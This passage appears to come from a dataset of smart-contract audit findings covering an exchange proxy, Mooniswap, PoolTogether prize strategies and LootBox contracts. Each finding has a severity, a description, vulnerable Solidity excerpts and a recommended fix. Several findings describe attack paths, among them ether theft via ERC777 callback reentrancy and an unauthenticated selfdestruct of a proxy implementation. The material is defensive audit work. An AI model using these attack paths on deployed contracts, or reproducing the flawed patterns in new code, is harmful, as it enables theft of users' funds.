token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, \"Mooniswap: access denied\");\\n require(token1.uniBalanceOf(address(this)) >= balance1, \"Mooniswap: access denied\");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, \"Mooniswap: access denied\");\\n}\\n```\\n -Ether temporarily held during transactions can be stolen via reentrancyчhighчThe exchange proxy typically holds no ether balance, but it can temporarily hold a balance during a transaction. This balance is vulnerable to theft if the following conditions are met:\\nNo check at the end of the transaction reverts if ether goes missing,\\nreentrancy is possible during the transaction, and\\na mechanism exists to spend ether held by the exchange proxy.\\nWe found one example where these conditions are met, but it's possible that more exist.\\nExample\\n`MetaTransactionsFeature.executeMetaTransaction()` accepts ether, which is used to pay protocol fees. It's possible for less than the full amount in `msg.value` to be consumed, which is why the function uses the `refundsAttachedEth` modifier to return any remaining ether to the caller:\\n```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n\\nNotice that this modifier just returns the remaining ether balance (up to msg.value). It does not check for a specific amount of remaining ether. This meets condition (1) above.\\nIt's impossible to reenter the system with a second metatransaction because `executeMetaTransaction()` uses the modifier `nonReentrant`, but there's nothing preventing reentrancy via a different feature. We can achieve reentrancy by trading a token that uses callbacks (e.g. ERC777's hooks) during transfers. This meets condition (2).\\nTo find a full exploit, we also need a way to extract the ether held by the exchange proxy. `LiquidityProviderFeature.sellToLiquidityProvider()` provides such a mechanism. By passing `ETH_TOKEN_ADDRESS` as the `inputToken` and an address in the attacker's control as the `provider`, an attacker can transfer out any ether held by the exchange proxy. Note that `sellToLiquidityProvider()` can transfer any amount of ether, not limited to the amount sent via msg.value:\\n```\\nif (inputToken == ETH\\_TOKEN\\_ADDRESS) {\\n provider.transfer(sellAmount);\\n```\\n\\nThis meets condition (3).\\nThe full steps to exploit this vulnerability are as follows:\\nA maker/attacker signs a trade where one of the tokens will invoke a callback during the trade.\\nA taker signs a metatransaction to take this trade.\\nA relayer sends in the metatransaction, providing more ether than is necessary to pay the protocol fee. (It's unclear how likely this situation is.)\\nDuring the token callback, the attacker invokes `LiquidityProviderFeature.sellToLiquidityProvider()` to transfer the excess ether to their account.\\nThe metatransaction feature returns the remaining ether balance, which is now zero.чIn general, we recommend using strict accounting of ether throughout the system. If there's ever a temporary balance, it should be accurately resolved at the end of the transaction, after any potential reentrancy opportunities.\\nFor the example we specifically found, we recommend doing strict accounting in the metatransactions feature. This means features called via a metatransaction would need to return how much ether was consumed. The metatransactions feature could then refund exactly `msg.value - `. The transaction should be reverted if this fails because it means ether went missing during the transaction.\\nWe also recommend limiting `sellToLiquidityProvider()` to only transfer up to `msg.value`. This is a form of defense in depth in case other vectors for a similar attack exist.чч```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n -UniswapFeature: Non-static call to ERC20.allowance()чlowчIn the case where a token is possibly “greedy” (consumes all gas on failure), `UniswapFeature` makes a call to the token's `allowance()` function to check whether the user has provided a token allowance to the protocol proxy or to the `AllowanceTarget`. This call is made using `call()`, potentially allowing state-changing operations to take place before control of the execution returns to `UniswapFeature`.\\n```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\nчReplace the `call()` with a `staticcall()`.чч```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n -UniswapFeature: Unchecked returndatasize in low-level external callsчlowч`UniswapFeature` makes a number of external calls from low-level assembly code. Two of these calls rely on the `CALL` opcode to copy the returndata to memory without checking that the call returned the expected amount of data. Because the `CALL` opcode does not zero memory if the call returns less data than expected, this can lead to usage of dirty memory under the assumption that it is data returned from the most recent call.\\nCall to `UniswapV2Pair.getReserves()`\\n```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n\\nCall to `ERC20.allowance()`\\n```\\n// Check if we have enough direct allowance by calling\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\nчInstead of providing a memory range for `call()` to write returndata to, explicitly check `returndatasize()` after the call is made and then copy the data into memory using `returndatacopy()`.\\n```\\nif lt(returndatasize(), EXPECTED\\_SIZE) {\\n revert(0, 0) \\n}\\nreturndatacopy(0xC00, 0x00, EXPECTED\\_SIZE)\\n```\\nчч```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n -PeriodicPrizeStrategy - RNG failure can lock user fundsчhighчTo prevent manipulation of the `SortitionSumTree` after a requested random number enters the mempool, users are unable to withdraw funds while the strategy contract waits on a random number request between execution of `startAward()` and `completeAward()`.\\nIf an rng request fails, however, there is no way to exit this locked state. After an rng request times out, only `startAward()` can be called, which will make another rng request and re-enter the same locked state. The rng provider can also not be updated while the contract is in this state. If the rng provider fails permanently, user funds are permanently locked.\\n`requireNotLocked()` prevents transfers, deposits, or withdrawals when there is a pending award.\\n```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n\\n```\\nfunction \\_requireNotLocked() internal view {\\n uint256 currentBlock = \\_currentBlock();\\n require(rngRequest.lockBlock == 0 || currentBlock < rngRequest.lockBlock, \"PeriodicPrizeStrategy/rng-in-flight\");\\n}\\n```\\n\\n`setRngService()` reverts if there is a pending or timed-out rng request\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), \"PeriodicPrizeStrategy/rng-in-flight\");\\n```\\nчInstead of forcing the pending award phase to be re-entered in the event of an rng request time-out, provide an `exitAwardPhase()` function that ends the award phase without paying out the award. This will at least allow users to withdraw their funds in the event of a catastrophic failure of the rng service. It may also be prudent to allow the rng service to be updated in the event of an rng request time out.чч```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n -LootBox - Unprotected selfdestruct in proxy implementationчhighчWhen the `LootBoxController` is deployed, it also deploys an instance of `LootBox`. When someone calls `LootBoxController.plunder()` or `LootBoxController.executeCall()` the controller actually deploys a temporary proxy contract to a deterministic address using `create2`, then calls out to it to collect the loot.\\nThe `LootBox` implementation contract is completely unprotected, exposing all its functionality to any actor on the blockchain. The most critical functionality is actually the `LootBox.destroy()` method that calls `selfdestruct()` on the implementation contract.\\nTherefore, an unauthenticated user can `selfdestruct` the `LootBox` proxy implementation and cause the complete system to become dysfunctional. As an effect, none of the AirDrops that were delivered based on this contract will be redeemable (Note: `create2` deploy address is calculated from the current contract address and salt). Funds may be lost.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n\\n```\\n/// @notice Destroys this contract using `selfdestruct`\\n/// @param to The address to send remaining Ether to\\nfunction destroy(address payable to) external {\\n selfdestruct(to);\\n}\\n```\\n\\nnot in scope but listed for completeness\\n```\\ncontract CounterfactualAction {\\n function depositTo(address payable user, PrizePool prizePool, address output, address referrer) external {\\n IERC20 token = IERC20(prizePool.token());\\n uint256 amount = token.balanceOf(address(this));\\n token.approve(address(prizePool), amount);\\n prizePool.depositTo(user, amount, output, referrer);\\n selfdestruct(user);\\n }\\n\\n function cancel(address payable user, PrizePool prizePool) external {\\n IERC20 token = IERC20(prizePool.token());\\n token.transfer(user, token.balanceOf(address(this)));\\n selfdestruct(user);\\n }\\n```\\nчEnforce that only the deployer of the contract can call functionality in the contract. Make sure that nobody can destroy the implementation of proxy contracts.чч```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n -PeriodicPriceStrategy - trustedForwarder can impersonate any msg.senderчhighчThe `trustedForwarder` undermines the trust assumptions in the system. For example, one would assume that the access control modifier `onlyPrizePool` would only allow the configured `PrizePool` to call certain methods. However, in reality, the `trustedForwarder` can assume this position as well. The same is true for the `onlyOwnerOrListener` modifier. One would assume `msg.sender` must either be `periodicPrizeStrategyListener` or `owner` (the initial deployer) while the `trustedForwarder` can assume any of the administrative roles.\\nThe centralization of power to allow one account to impersonate other components and roles (owner, `listener`, prizePool) in the system is a concern by itself and may give users pause when deciding whether to trust the contract system. The fact that the `trustedForwarder` can spoof events for any `msg.sender` may also make it hard to keep an accurate log trail of events in case of a security incident.\\nNote: The same functionality seems to be used in `ControlledToken` and other contracts which allows the `trustedForwarder` to assume any tokenholder in `ERC20UpgradeSafe`. There is practically no guarantee to `ControlledToken` holders.\\nNote: The trustedForwarder/msgSender() pattern is used in multiple contracts, many of which are not in the scope of this assessment.\\naccess control modifiers that can be impersonated\\n```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), \"PeriodicPrizeStrategy/only-prize-pool\");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyOwnerOrListener() {\\n require(\\_msgSender() == owner() || \\_msgSender() == address(periodicPrizeStrategyListener), \"PeriodicPrizeStrategy/only-owner-or-listener\");\\n \\_;\\n}\\n```\\n\\nevent `msg.sender` that can be spoofed because the actual `msg.sender` can be `trustedForwarder`\\n```\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n```\\nemit PrizePoolAwardStarted(\\_msgSender(), address(prizePool), requestId, lockBlock);\\n```\\n\\n```\\nemit PrizePoolAwarded(\\_msgSender(), randomNumber);\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n`_msgSender()` implementation allows the `trustedForwarder` to impersonate any `msg.sender` address\\n```\\n/// @dev Provides information about the current execution context for GSN Meta-Txs.\\n/// @return The payable address of the message sender\\nfunction \\_msgSender()\\n internal\\n override(BaseRelayRecipient, ContextUpgradeSafe)\\n virtual\\n view\\n returns (address payable)\\n{\\n return BaseRelayRecipient.\\_msgSender();\\n}\\n```\\nчRemove the `trustedForwarder` or restrict the type of actions the forwarder can perform and don't allow it to impersonate other components in the system. Make sure users understand the trust assumptions and who has what powers in the system. Make sure to keep an accurate log trail of who performed which action on whom's behalf.чч```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), \"PeriodicPrizeStrategy/only-prize-pool\");\\n \\_;\\n}\\n```\\n -Unpredictable behavior for users due to admin front running or general bad timingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nAn administrator (deployer) of `MultipleWinners` can change the number of winners in the system without warning. This has the potential to violate a security goal of the system.\\nadmin can change the number of winners during a prize-draw period\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may switch-out RNG service at any time (when RNG is not in inflight or timed-out)\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), \"PeriodicPrizeStrategy/rng-in-flight\");\\n\\n rng = rngService;\\n emit RngServiceUpdated(address(rngService));\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin can effectively disable the rng request timeout by setting a high value during a prize-draw (e.g. to indefinitely block payouts)\\n```\\nfunction setRngRequestTimeout(uint32 \\_rngRequestTimeout) external onlyOwner {\\n \\_setRngRequestTimeout(\\_rngRequestTimeout);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may set new tokenListener which might intentionally block token-transfers\\n```\\nfunction setTokenListener(TokenListenerInterface \\_tokenListener) external onlyOwner {\\n tokenListener = \\_tokenListener;\\n\\n emit TokenListenerUpdated(address(tokenListener));\\n}\\n```\\n\\n```\\nfunction setPeriodicPrizeStrategyListener(address \\_periodicPrizeStrategyListener) external onlyOwner {\\n periodicPrizeStrategyListener = PeriodicPrizeStrategyListener(\\_periodicPrizeStrategyListener);\\n\\n emit PeriodicPrizeStrategyListenerSet(\\_periodicPrizeStrategyListener);\\n}\\n```\\n\\nout of scope but mentioned as a relevant example: `PrizePool` owner can set new `PrizeStrategy` at any time\\n```\\n/// @notice Sets the prize strategy of the prize pool. Only callable by the owner.\\n/// @param \\_prizeStrategy The new prize strategy\\nfunction setPrizeStrategy(address \\_prizeStrategy) external override onlyOwner {\\n \\_setPrizeStrategy(TokenListenerInterface(\\_prizeStrategy));\\n}\\n```\\n\\na malicious admin may remove all external ERC20/ERC721 token awards prior to the user claiming them (admin front-running opportunity)\\n```\\nfunction removeExternalErc20Award(address \\_externalErc20, address \\_prevExternalErc20) external onlyOwner {\\n externalErc20s.removeAddress(\\_prevExternalErc20, \\_externalErc20);\\n emit ExternalErc20AwardRemoved(\\_externalErc20);\\n}\\n```\\n\\n```\\nfunction removeExternalErc721Award(address \\_externalErc721, address \\_prevExternalErc721) external onlyOwner {\\n externalErc721s.removeAddress(\\_prevExternalErc721, \\_externalErc721);\\n delete externalErc721TokenIds[\\_externalErc721];\\n emit ExternalErc721AwardRemoved(\\_externalErc721);\\n}\\n```\\n\\nthe `PeriodicPrizeStrategy` `owner` (also see concerns outlined in issue 5.4) can transfer external ERC20 at any time to avoid them being awarded to users. there is no guarantee to the user.\\n```\\nfunction transferExternalERC20(\\n address to,\\n address externalToken,\\n uint256 amount\\n)\\n external\\n onlyOwner\\n{\\n prizePool.transferExternalERC20(to, externalToken, amount);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.чч```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n -PeriodicPriceStrategy - addExternalErc721Award duplicate or invalid tokenIds may block award phaseчmediumчThe prize-strategy owner (or a listener) can add `ERC721` token awards by calling `addExternalErc721Award` providing the `ERC721` token address and a list of `tokenIds` owned by the prizePool.\\nThe method does not check if duplicate `tokenIds` or `tokenIds` that are not owned by the contract are provided. This may cause an exception when `_awardExternalErc721s` calls `prizePool.awardExternalERC721` to transfer an invalid or previously transferred token, blocking the award phase.\\nNote: An admin can recover from this situation by removing and re-adding the `ERC721` token from the awards list.\\nadding `tokenIds`\\n```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), \"PeriodicPrizeStrategy/external-erc721-not-contract\");\\n require(prizePool.canAwardExternal(\\_externalErc721), \"PeriodicPrizeStrategy/cannot-award-external\");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), \"PeriodicPrizeStrategy/unavailable-token\");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n\\nawarding tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n\\ntransferring the tokens\\n```\\n/// @notice Called by the prize strategy to award external ERC721 prizes\\n/// @dev Used to award any arbitrary NFTs held by the Prize Pool\\n/// @param to The address of the winner that receives the award\\n/// @param externalToken The address of the external NFT token being awarded\\n/// @param tokenIds An array of NFT Token IDs to be transferred\\nfunction awardExternalERC721(\\n address to,\\n address externalToken,\\n uint256[] calldata tokenIds\\n)\\n external override\\n onlyPrizeStrategy\\n{\\n require(\\_canAwardExternal(externalToken), \"PrizePool/invalid-external-token\");\\n\\n if (tokenIds.length == 0) {\\n return;\\n }\\n\\n for (uint256 i = 0; i < tokenIds.length; i++) {\\n IERC721(externalToken).transferFrom(address(this), to, tokenIds[i]);\\n }\\n\\n emit AwardedExternalERC721(to, externalToken, tokenIds);\\n}\\n```\\nчEnsure that no duplicate token-ids were provided or skip over token-ids that are not owned by prize-pool (anymore).чч```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), \"PeriodicPrizeStrategy/external-erc721-not-contract\");\\n require(prizePool.canAwardExternal(\\_externalErc721), \"PeriodicPrizeStrategy/cannot-award-external\");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), \"PeriodicPrizeStrategy/unavailable-token\");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n -PeriodicPrizeStrategy - Token with callback related warnings (ERC777 a.o.)чmediumчThis issue is highly dependent on the configuration of the system. If an admin decides to allow callback enabled token (e.g. `ERC20` compliant `ERC777` or other ERC721/ERC20 extensions) as awards then one recipient may be able to\\nblock the payout for everyone by forcing a revert in the callback when accepting token awards\\nuse the callback to siphon gas, mint gas token, or similar activities\\npotentially re-enter the `PrizeStrategy` contract in an attempt to manipulate the payout (e.g. by immediately withdrawing from the pool to manipulate the 2nd ticket.draw())\\n```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\nчIt is highly recommended to not allow tokens with callback functionality into the system. Document and/or implement safeguards that disallow the use of callback enabled tokens. Consider implementing means for the “other winners” to withdraw their share of the rewards independently from others.чч```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n -PeriodicPrizeStrategy - unbounded external tokens linked list may be used to force a gas DoSчmediumчThe size of the linked list of ERC20/ERC721 token awards is not limited. This fact may be exploited by an administrative account by adding an excessive number of external token addresses.\\nThe winning user might want to claim their win by calling `completeAward()` which fails in one of the `_distribute() -> _awardAllExternalTokens() -> _awardExternalErc20s/_awardExternalErc721s` while loops if too many token addresses are configured and gas consumption hits the block gas limit (or it just gets too expensive for the user to call).\\nNote: an admin can recover from this situation by removing items from the list.\\n```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), \"PeriodicPrizeStrategy/cannot-award-external\");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n\\n```\\n/// @param newAddress The address to shift to the front of the list\\nfunction addAddress(Mapping storage self, address newAddress) internal {\\n require(newAddress != SENTINEL && newAddress != address(0), \"Invalid address\");\\n require(self.addressMap[newAddress] == address(0), \"Already added\");\\n self.addressMap[newAddress] = self.addressMap[SENTINEL];\\n self.addressMap[SENTINEL] = newAddress;\\n self.count = self.count + 1;\\n}\\n```\\n\\nawarding the tokens loops through the linked list of configured tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\nчLimit the number of tokens an admin can add. Consider implementing an interface that allows the user to claim tokens one-by-one or in user-configured batches.чч```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), \"PeriodicPrizeStrategy/cannot-award-external\");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n -MultipleWinners - setNumberOfWinners does not enforce count>0чmediumчThe constructor of `MultipleWinners` enforces that the argument `_numberOfWinners > 0` while `setNumberOfWinners` does not. A careless or malicious admin might set `__numberOfWinners` to zero to cause the `distribute()` method to throw and not pay out any winners.\\nenforced in the constructor\\n```\\nrequire(\\_numberOfWinners > 0, \"MultipleWinners/num-gt-zero\");\\n```\\n\\nnot enforced when updating the value at a later stage\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\nчRequire that `numberOfWinners > 0`.чч```\\nrequire(\\_numberOfWinners > 0, \"MultipleWinners/num-gt-zero\");\\n```\\n -LootBox - plunder should disallow plundering to address(0)чmediumчAnyone can call `LootboxController.plunder()` to plunder on behalf of a `tokenId` owner. If a `LootBox` received an AirDrop but no `NFT` was issued to an owner (yet) this might open up an opportunity for a malicious actor to call `plunder()` in an attempt to burn the ETH and any airdropped tokens that allow transfers to `address(0)`.\\nNote:\\nDepending on the token implementation, transfers may or may not revert if the `toAddress == address(0)`, while burning the `ETH` will succeed.\\nThis might allow anyone to forcefully burn received `ETH` that would otherwise be available to the future beneficiary\\nIf the airdrop and transfer of `LootBox` ownership are not done within one transaction, this might open up a front-running window that allows a third party to burn air-dropped `ETH` before it can be claimed by the `owner`.\\nconsider one component issues the airdrop in one transaction (or block) and setting the `owner` in a later transaction (or block). The `owner` is unset for a short duration of time which might allow anyone to burn `ETH` held by the `LootBox` proxy instance.\\n`plunder()` receiving the `owner` of an `ERC721.tokenId`\\n```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n\\nThe modified `ERC721` returns `address(0)` if the owner is not known\\n```\\n \\* @dev See {IERC721-ownerOf}.\\n \\*/\\nfunction ownerOf(uint256 tokenId) public view override returns (address) {\\n return \\_tokenOwners[tokenId];\\n}\\n```\\n\\nWhile `withdraw[ERC20|ERC721|ERC1155]` fail with `to == address(0)`, `transferEther()` succeeds and burns the eth by sending it to `address(0)`\\n```\\nfunction plunder(\\n IERC20[] memory erc20,\\n WithdrawERC721[] memory erc721,\\n WithdrawERC1155[] memory erc1155,\\n address payable to\\n) external {\\n \\_withdrawERC20(erc20, to);\\n \\_withdrawERC721(erc721, to);\\n \\_withdrawERC1155(erc1155, to);\\n transferEther(to, address(this).balance);\\n}\\n```\\nчRequire that the destination address `to` in `plunder()` and `transferEther()` is not `address(0)`.чч```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n -PeriodicPrizeStrategy - Inconsistent behavior between award-phase modifiers and view functionsчlowчThe logic in the `canStartAward()` function is inconsistent with that of the `requireCanStartAward` modifier, and the logic in the `canCompleteAward()` function is inconsistent with that of the `requireCanCompleteAward` modifier. Neither of these view functions appear to be used elsewhere in the codebase, but the similarities between the function names and the corresponding modifiers is highly misleading.\\n`canStartAward()` is inconsistent with `requireCanStartAward`\\n```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n\\n```\\nmodifier requireCanStartAward() {\\n require(\\_isPrizePeriodOver(), \"PeriodicPrizeStrategy/prize-period-not-over\");\\n require(!isRngRequested() || isRngTimedOut(), \"PeriodicPrizeStrategy/rng-already-requested\");\\n \\_;\\n}\\n```\\n\\n`canCompleteAward()` is inconsistent with `requireCanCompleteAward`\\n```\\nfunction canCompleteAward() external view returns (bool) {\\n return isRngRequested() && isRngCompleted();\\n}\\n```\\n\\n```\\nmodifier requireCanCompleteAward() {\\n require(\\_isPrizePeriodOver(), \"PeriodicPrizeStrategy/prize-period-not-over\");\\n require(isRngRequested(), \"PeriodicPrizeStrategy/rng-not-requested\");\\n require(isRngCompleted(), \"PeriodicPrizeStrategy/rng-not-complete\");\\n \\_;\\n}\\n```\\nчMake the logic consistent between the view functions and the modifiers of the same name or remove the functions.чч```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n -MultipleWinners - Awards can be guaranteed with a set number of ticketsчlowчBecause additional award drawings are distributed at a constant interval in the `SortitionSumTree` by `MultipleWinners._distribute()`, any user that holds a number of tickets `>= floor(totalSupply / __numberOfWinners)` can guarantee at least one award regardless of the initial drawing.\\nMultipleWinners._distribute():\\n```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n 